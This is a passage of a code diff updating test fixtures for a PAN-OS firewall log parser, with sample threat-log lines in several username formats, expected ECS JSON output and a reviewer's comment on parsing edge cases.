@@ -5501,8 +5456,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5622,8 +5576,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5743,8 +5696,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5864,8 +5816,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5985,8 +5936,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6106,8 +6056,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6227,8 +6176,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6348,8 +6296,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6469,8 +6416,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6590,8 +6536,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6711,8 +6656,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6832,8 +6776,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6953,8 +6896,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7074,8 +7016,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7195,8 +7136,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" 
@@ -7316,8 +7256,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7437,8 +7376,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7558,8 +7496,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7679,8 +7616,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7800,8 +7736,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7921,8 +7856,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8042,8 +7976,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8163,8 +8096,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8284,8 +8216,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8405,8 +8336,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8526,8 +8456,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8647,8 +8576,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8768,8 +8696,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8889,8 +8816,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -9010,8 +8936,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" 
@@ -9131,8 +9056,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -9252,8 +9176,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -9363,8 +9286,7 @@ "related": { "ip": [ "192.168.0.2", - "192.168.0.1", - "0.0.0.0" + "192.168.0.1" ], "user": [ "crusher" @@ -9484,8 +9406,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -9605,8 +9526,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -9716,8 +9636,7 @@ "related": { "ip": [ "192.168.0.2", - "192.168.0.1", - "0.0.0.0" + "192.168.0.1" ], "user": [ "crusher" @@ -9827,8 +9746,7 @@ "related": { "ip": [ "192.168.0.2", - "192.168.0.1", - "0.0.0.0" + "192.168.0.1" ], "user": [ "crusher" @@ -9948,8 +9866,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10069,8 +9986,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10190,8 +10106,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10311,8 +10226,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10432,8 +10346,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10543,8 +10456,7 @@ "related": { "ip": [ "192.168.0.2", - "192.168.0.1", - "0.0.0.0" + "192.168.0.1" ], "user": [ "crusher" @@ -10664,8 +10576,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10785,8 +10696,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" 
@@ -10906,8 +10816,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11027,8 +10936,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11148,8 +11056,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11269,8 +11176,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11390,8 +11296,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11511,8 +11416,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11622,8 +11526,7 @@ "related": { "ip": [ "192.168.0.2", - "192.168.0.1", - "0.0.0.0" + "192.168.0.1" ], "user": [ "crusher" @@ -11743,8 +11646,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11864,8 +11766,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -11985,8 +11886,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json index 31f3053017d..73dc2990809 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json @@ -139,8 +139,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -314,7 +313,6 @@ "ip": [ "192.168.0.2", "175.16.199.1", - "0.0.0.0", "127.0.0.1" ], "user": [ 
@@ -490,7 +488,6 @@ "ip": [ "192.168.0.2", "175.16.199.1", - "0.0.0.0", "127.0.0.1" ], "user": [ diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log index 1322da68afb..3a66e5a720d 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log 
@@ -187,3 +187,12 @@ Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/1 1,2021/11/16 10:10:34,007051000184334,THREAT,spyware,2561,2021/11/16 10:10:34,89.160.20.156,67.43.156.13,81.2.69.193,67.43.156.13,LAn-TO-WAn,,,dns,vsys1,LAN,WAN,ethernet1/2,ethernet1/1,LFPpan,2021/11/16 10:10:34,31373,1,58903,53,26180,53,0x403000,udp,drop-packet,"www.virussign.com",generic:www.virussign.com(327891564),any,medium,client-to-server,7029847907104718942,0x0,United States,United States,,,0,,,0,,,,,,,,0,0,0,0,0,,PA-VM,,,,,0,,0,,N/A,dns-malware,AppThreat-0-0,0x0,0,4294967295,,,5aa3aaa9-610a-433a-8aaa-729378021aaa,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2021-11-16T10:10:35.294-08:00,,,,infrastructure,networking,network-protocol,3,"used-by-malware,has-known-vulnerability,pervasive-use",,dns,no,no 1,2023/10/04 09:40:58,007058000248010,THREAT,url,2816,2023/10/04 09:40:58,10.1.0.12,192.168.15.224,10.138.0.44,192.168.15.224,reset-adult,,,ssl,vsys1,private,public,ethernet1/2,ethernet1/1,,2023/10/04 09:40:58,763,1,50462,443,15048,443,0x407400,tcp,block-url,"adult.com/",(9999),adult,informational,client-to-server,7286123782408765451,0x0,10.0.0.0-10.255.255.255,United States,,,0,,,0,,,,,,,,0,0,0,0,0,,PA-VM,,,,,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,"adult,low-risk",73a06abf-75ca-436f-9319-1a15b27fa692,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2023-10-04T09:40:58.388-07:00,,,,encrypted-tunnel,networking,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,ssl,no,no,,,NonProxyTraffic 1,2023/10/04 09:40:43,007058000248010,THREAT,url,2816,2023/10/04 09:40:43,10.1.0.12,192.168.15.224,10.138.0.44,192.168.15.224,block-sports,,,web-browsing,vsys1,private,public,ethernet1/2,ethernet1/1,elastic,2023/10/04 09:40:43,730,1,54344,80,1618,80,0x407000,tcp,block-url,"www.espn.com/",(9999),sports,informational,client-to-server,7286123782408765449,0x0,10.0.0.0-10.255.255.255,United 
States,,,0,,,1,,,,,,,,0,0,0,0,0,,PA-VM,,,,get,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,"sports,low-risk",eb5b9cd9-716b-4729-a5de-9033f4c5aa4f,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2023-10-04T09:40:43.387-07:00,,,,internet-utility,general-internet,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,web-browsing,no,no,,,NonProxyTraffic +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src-domainname\src_username,dst-domainname\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,nt-autorit..t\src_username,nt-autorit..t\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,.\src_username,.\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src-domainname\\src_username,dst-domainname\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_username@src-domainname,dst_username@dst-domainname,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_username,dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United 
States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,x-fwd-for: 10.10.10.50,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_domainname\\src-user#name,dst_domainname\\dst-user#name,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_domain..name\\src-user#name,dst_domain..name\\dst-user#name,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, 
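Review bot: The added sample whose source-user column is `x-fwd-for: 10.10.10.50` puts a client-supplied X-Forwarded-For value where the parser normally reads a user identity, but the matching entry in the `-expected.json` file is outside the visible hunks, so it is not clear whether the pipeline keeps that value out of `user.name` and `related.user`. Since an X-Forwarded-For header is attacker-controlled, the expected output for this line should pin down where the value lands (for example `client.ip` or `network.forwarded_ip`, not a user field), otherwise a forged header could populate identity fields used for correlation. Separately, `nt-autorit..t` and `src_domain..name` look like non-ASCII domain names (an umlaut, presumably) that were replaced by `..` when the sample was pasted; the visible expected output reproduces `nt-autorit..t` verbatim as `user.domain`, so these lines only prove that a literal `..` survives, not that UTF-8 domains are handled. If the intent is to cover non-ASCII domains, the sample should carry the real bytes, e.g. `NT-AUTORITÄT\src_username`. The nine lines otherwise share the same flow id, sequence number and timestamp, which is fine for a parser test but worth a note in the PR description so nobody later reads them as nine distinct sessions.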
diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json index 9fbcf37d2f0..e29396b147b 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json 
@@ -32599,6 +32599,1580 @@ "original": "www.espn.com/", "path": "/" } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + "domain": "dst-domainname", + "name": "dst_username" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src-domainname\\src_username,dst-domainname\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src-domainname\\src_username,dst-domainname\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src_username", + "dst_username" + ] + }, + "rule": { + "name": 
"new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "domain": "src-domainname", + "name": "src_username" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "domain": "src-domainname", + "name": "src_username" + } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + "domain": "nt-autorit..t", + "name": "dst_username" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,nt-autorit..t\\src_username,nt-autorit..t\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + 
"nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,nt-autorit..t\\src_username,nt-autorit..t\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + 
"category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src_username", + "dst_username" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "domain": "nt-autorit..t", + "name": "src_username" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "domain": "nt-autorit..t", + "name": "src_username" + } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + "domain": ".", + "name": "dst_username" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 